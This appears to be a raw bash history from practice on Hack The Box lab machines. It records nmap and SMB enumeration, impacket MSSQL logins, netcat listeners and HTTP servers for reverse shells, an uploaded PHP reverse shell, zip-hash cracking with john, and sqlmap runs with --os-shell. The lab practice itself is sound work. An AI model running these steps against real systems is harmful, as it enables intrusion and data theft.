    1  sudo apt install python3-pip
    2  sudo apt install python-pip
    3  sudo apt-get install python3-pip
    4  sudo apt-get install python-pip
    5  pip -help
    6  sudo apt-get install git
    7  git clone https://github.com/SecureAuthCorp/impacket.git
    8  cd Downloads
    9  mkdir opt
   10  cd opt 
   11  git clone https://github.com/SecureAuthCorp/impacket.git
   12  clear
   13  ls
   14  cd impacket
   15  clear
   16  sudo apt-get install python-pip
   17  sudo apt install python-pip
   18  sudo apt install python3-pip
   19  clear
   20  sudo apt update
   21  sudo apt install python3-pip
   22  clear
   23  sudo apt install python-pip
   24  sudo apt install python3-pip
   25  clear
   26  pip3 install -r requirements.txt
   27  python setup.py install
   28  sudo python setup.py install
   29  clear
   30  ls
   31  cd examples
   32  ls
   33  cleaer
   34  clear
   35  sudo apt-get install python-pip
   36  cd ~
   37  sudo apt purge impacket
   38  pip unistall impacket
   39  pip uninstall impacket
   40  ping 10.10.10.27
   41  clear
   42  ping 10.10.10.27
   43  clear
   44  nmap -sC -sV 10.10.10.27
   45  nmap -sC -sV -Pn 10.10.10.27 
   46  smbclient -N -L \\\\10.10.10.27\\ 
   47  smbclient -N \\\\10.10.10.27\\ 
   48  smbclient -N \\\\10.10.10.27\\backups
   49  clear
   50  ls
   51  cd Downloads
   52  cd opt
   53  clear
   54  cd impacket
   55  ls
   56  clear
   57  cd examples
   58  clear
   59  ls
   60  mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27
   61  clear
   62  mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
   63  clear
   64  ls
   65  mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
   66  clear
   67  sudo mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
   68  cd ..
   69  sudo -rm -r impacket
   70  sudo pip install -r requirements.txt
   71  clear
   72  sudo pip setup.py install
   73  ls
   74  sudo python3 setup.py install
   75  clear
   76  cd examples
   77  mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
   78  sudo nc -lvnp 443
   79  clear
   80  ifconfig tun0
   81  cd ~
   82  clear
   83  ifconfig tun0
   84  clear
   85  sudo python3 -m http.server 80
   86  clear
   87  cd Downloads
   88  ls | grep nc.exe
   89  cd opt
   90  ls
   91  clear
   92  ls | grep nc.exe
   93  sudo python3 -m http.server 80
   94  cd ~
   95  clear
   96  sudo python3 -m http.server 80
   97  clear
   98  sudo python3 -m http.server 8000
   99  sudo nc -nlvp 1234
  100  clear
  101  sudo python3 -m http.server 8000
  102  clear
  103  cd ~
  104  sudo python3 -m http.server 80
  105  sudo apt-get remove --auto-remove python-impacket
  106  sudo apt-get remove python-impacket
  107  sudo apt-get purge python-impacket  
  108  sudo apt-get purge impacket  
  109  sudo apt-get purge python3-impacket  
  110  sudo apt-get remove --auto-remove python3-impacket
  111  clear
  112  cd Downloads
  113  ls
  114  mkdir opt
  115  clear
  116  cd opt
  117  git clone https://github.com/SecureAuthCorp/impacket.git
  118  cd impacket
  119  clear
  120  sudo pip install -r requirement.txt
  121  ls
  122  sudo pip install -r requirement.txt
  123  sudo pip install -r requirements.txt
  124  clear
  125  sudo python setup.py install
  126  clear
  127  cd examples
  128  clear
  129  ls
  130  mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
  131  cd ..
  132  clear
  133  cd impacket-master
  134  cd examples
  135  mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
  136  mssqlclient.py sql_svc@10.10.10.27 -windows-auth
  137  clear
  138  mssqlclient.py sql_svc@10.10.10.27 -windows-auth
  139  clear
  140  python3 mssqlclient sql_svc@10.10.10.27
  141  python3 mssqlclient.py sql_svc@10.10.10.27
  142  python3 mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27
  143  clear
  144  python3 mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27
  145  python3 mssqlclient.py sql_svc@10.10.10.27
  146  python3 mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
  147  clear
  148  python3 mssqlclient.py ARCHETYPE\sql_svc@10.10.10.27 -windows-auth
  149  clear
  150  python3 mssqlclient.py sql_svc@10.10.10.27 -windows-auth
  151  clear
  152  python3 mssqlclient.py sql_svc@10.10.10.27 -windows-auth
  153  clear
  154  cd ~
  155  clear
  156  sudo python3 -m http.server 80
  157  cleaer
  158  clear
  159  sudo python3 -m http.server 80
  160  clear
  161  sudo python3 -m http.server 90
  162  clear
  163  cd ~
  164  clear
  165  ping 10.10.10.30
  166  clear
  167  nmap -A -Pn -T4 10.10.10.27 
  168  clear
  169  cd Downloads
  170  cd OPENVPN
  171  clear
  172  ls
  173  sudo openvpn starting_point_SY254.ovpn
  174  ssh 10.10.10.28
  175  clear
  176  sudo nano /etc/hosts
  177  cat /etc/hosts
  178  clear
  179  for i in `seq 1 100`; do echo $i; done
  180  ls
  181  ifconfig tun0
  182  clear
  183  ls
  184  sudo nano php-reverse-shell.php
  185  cat php-reverse-shell.php
  186  clear
  187  cd usr
  188  ls
  189  sudo nc -lvnp 1234
  190  clear
  191  cd Downloads/opt
  192  git clone https://github.com/maurosoria/dirsearch.git
  193  ls
  194  cd dirsearch
  195  ls
  196  python3 dirsearch.py -u http://10.10.10.28 -e php
  197  curl http://10.10.10.28/uploads/test.php
  198  clear
  199  python3 dirsearch.py -u http://10.10.10.28 -e php
  200  clear
  201  python3 dirsearch.py -u http://10.10.10.28 -e php
  202  curl http://10.10.10.28/uploads/test/php
  203  curl http://10.10.10.28/uploads/test.phpp
  204  curl http://10.10.10.28/uploads/test.php
  205  sudo nano php-reverse-shell.php
  206  ping 10.10.10.28
  207  clear
  208  ping 10.10.10.28
  209  clear
  210  nmap -A -Pn -T4 10.10.10.28
  211  cd Downloads/OPENVPN
  212  ls
  213  clear
  214  sudo openvpn starting_point_SY254.ovpn
  215  ifconfig tun0
  216  clear
  217  curl http://10.10.10.28/uploads/test.php
  218  clear
  219  curl http://10.10.10.28/uploads/test.php
  220  clear
  221  ping 10.10.10.28
  222  clear
  223  ifconfig tun0
  224  clear
  225  ping 10.10.10.28
  226  clear
  227  i=1\nwhile [ $i -le 100 ]\ndo\n    echo $i\n    i=$(($i+1))\ndone
  228  ifconfig tun0
  229  clear
  230  cd Downloads
  231  ls
  232  cd opt
  233  ls
  234  clear
  235  cd dirsearch
  236  python3 dirsearch.py -u http://10.10.10.28 -e php
  237  ls
  238  clear
  239  python3 dirsearch.py -u http://10.10.10.28 -e php
  240  ping 10.10.10.28
  241  clear
  242  sudo cd Downloads/OPENVPN/starting_point_SY254.ovpn
  243  clear
  244  sudo starting_point_SY254.ovpn
  245  clear
  246  sudo openvpn starting_point_SY254.ovpn
  247  clear
  248  sudo openvpn starting_point_SY254.ovpn
  249  sudo nc -lvnp 1234
  250  curl http://10.10.10.28/uploads/test.php
  251  wget http://10.10.10.28/uploads/test.php
  252  ifconfig tun0
  253  clear
  254  curl http://10.10.10.28/uploads/test.php
  255  cd ~
  256  clear
  257  curl http://10.10.10.28/uploads/test.php
  258  ls
  259  clear
  260  curl http://10.10.10.28/uploads/test.php
  261  clear
  262  ifconfig tun0
  263  clear
  264  sudo nc -nlvp 1234
  265  curl http://10.10.10.28/uploads/reverse_shell.php
  266  sudo nc -lvnp 4444
  267  sudo python3 -m http.server 80
  268  ls
  269  zip2john backup.zip > hash
  270  john hash --fork=4 -w=/Home/seifudin/Downloads/rockyou.txt
  271  john hash --fork=4 -w=/home/seifudin/Downloads/rockyou.txt
  272  hash --show
  273  ls
  274  john hash --show
  275  unzip backup.zip
  276  cd Downloads
  277  l
  278  bash burpsuite_pro_linux_v2021_6_2.sh
  279  sudo apt-get remove burpsuite
  280  sudo apt-get remove --auto-remove burpsuite
  281  bash burpsuite_pro_linux_v2021_6_2.sh
  282  sudo apt-get remove burpsuite-pro
  283  sudo apt-get remove burpsuite-professional
  284  sudo apt-get remove burpsuite
  285  ifconfig tun0
  286  la
  287  bash burpsuite_community_linux_v2021_6_2.sh
  288  clear
  289  cd ~
  290  ls
  291  clear
  292  ls
  293  python3 vaccine.py
  294  clear
  295  python vaccine.py
  296  sudo python -m http.server 80
  297  clear
  298  sudo python3 -m http.server 80
  299  sudo nc -nlvp 4444
  300  python3 sqlmap -u http://10.10.10.46/dashboard.php?search=a --cookie="PHPSESSID:r7n1j31k0uv5t1jo38ermn7njc"
  301  sqlmap -u http://10.10.10.46/dashboard.php?search=a --cookie="PHPSESSID:r7n1j31k0uv5t1jo38ermn7njc" 
  302  sqlmap -u http://10.10.10.46/dashboard.php?search=a --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" 
  303  sqlmap -u http://10.10.10.46/dashboard.php?search=a --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  304  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  305  clear
  306  sudo apt-get install --only-upgrade sqlmap
  307  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  308  clear
  309  sqlmap man
  310  cleaer
  311  clear
  312  man sqlmap
  313  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc"
  314  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  315  clear
  316  cd Downloads/opt/impacket
  317  cd Downloads/opt
  318  ls
  319  clear
  320  cd ~
  321  clear
  322  cd Downloads/opt/impacket-master
  323  cd examples
  324  l
  325  clear
  326  ls
  327  sudo sqlmap --update
  328  clear
  329  sudo sqlmap --update
  330  sudo --update sqlmap 
  331  clear
  332  sudo sqlmap --update
  333  clear
  334  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  335  clear
  336  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  337  sudo apt install sqlmap
  338  clear
  339  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc"
  340  cd ~
  341  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc"
  342  cleat
  343  clear
  344  sudo apt-get install sqlmap
  345  sudo apt-get -remove sqlmap
  346  sudo apt-get --remove sqlmap
  347  clear
  348  history
  349  clear
  350  sudo apt-get remove sqlmap
  351  sudo apt-get install sqlmap
  352  clear
  353  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc"
  354  sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  355  clear
  356  sqlmap 'http://10.10.10.46/dashboard.php?search=a'  --cookie="PHPSESSD=r7n1j31k0uv5t1jo38ermn7njc"
  357  sqlmap 'http://10.10.10.46/dashboard.php?search=a'  --cookie="PHPSESSD=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  358  sudo nc -lvnp 4444
  359  clear
  360  cd Downloads/opt
  361  git clone https://github.com/sqlmapproject/sqlmap.git
  362  ls
  363  cd sqlmap
  364  ls
  365  python3 sqlmap.py -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc"
  366  python3 sqlmap.py -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7n1j31k0uv5t1jo38ermn7njc" --os-shell
  367  cd ..
  368  ls
  369  cd ~
  370  clear
  371  ls
  372  python3 vaccine.py
  373  sudo nc -lvnp 1234
  374  python3 -m http.server 80
  375  sudo python3 -m http.server 80
  376  ftp 10.10.10.46
  377  ifconfig tun0
  378  clear
  379  cd Downloads/opt/dirsearch
  380  python3 dirsearch.py -u http://10.10.10.28 -e php
  381  sudo curl http://10.10.10.28/uploads/test.php
  382  curl http://10.10.10.28/uploads/test.php
  383  clear
  384  python3 dirsearch.py -u http://10.10.10.28 -e php
  385  clear
  386  python3 dirsearch.py -u http://10.10.10.28 -e php
  387  clear
  388  cd ~
  389  clear
  390  ping 10.10.10.46
  391  clear
  392  nmap -A -Pn -T4 10.10.10.46
  393  sudo cd Downloads/OPENVPN/starting_point_SY254.ovpn
  394  cd Downloads/OPENVPN/starting_point_SY254.ovpn
  395  cd Downloads/OPENVPN
  396  clear
  397  sudo openvpn starting_point_SY254.ovpn
  398  cd Downloads/opt